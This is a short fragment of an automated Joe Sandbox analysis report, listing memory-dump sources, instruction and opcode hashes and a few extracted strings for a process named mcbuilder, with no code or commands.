                                                • Instruction Fuzzy Hash: A3813A75D002699BDB31DB94CC44BEEB7B8AB48710F0445EAEA19FB640D7349E84CFA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493514195.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3bb0000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )$* -8$+6%<$`l()
                                                • API String ID: 0-647279220
                                                • Opcode ID: cee342b36fab161dcef5bef29b321cc704d75c31aeb95d9342c277f1f3756c3c
                                                • Instruction ID: f9ee39e31fd3db9cff17cbbb7fec2c1fa7c788130135810bfbcac87e7d49dea5
                                                • Opcode Fuzzy Hash: cee342b36fab161dcef5bef29b321cc704d75c31aeb95d9342c277f1f3756c3c
                                                • Instruction Fuzzy Hash: 44F0823511878457C704AB14C445696BBE1FB9830CF5016ADE48ADB251DE3A9616C78A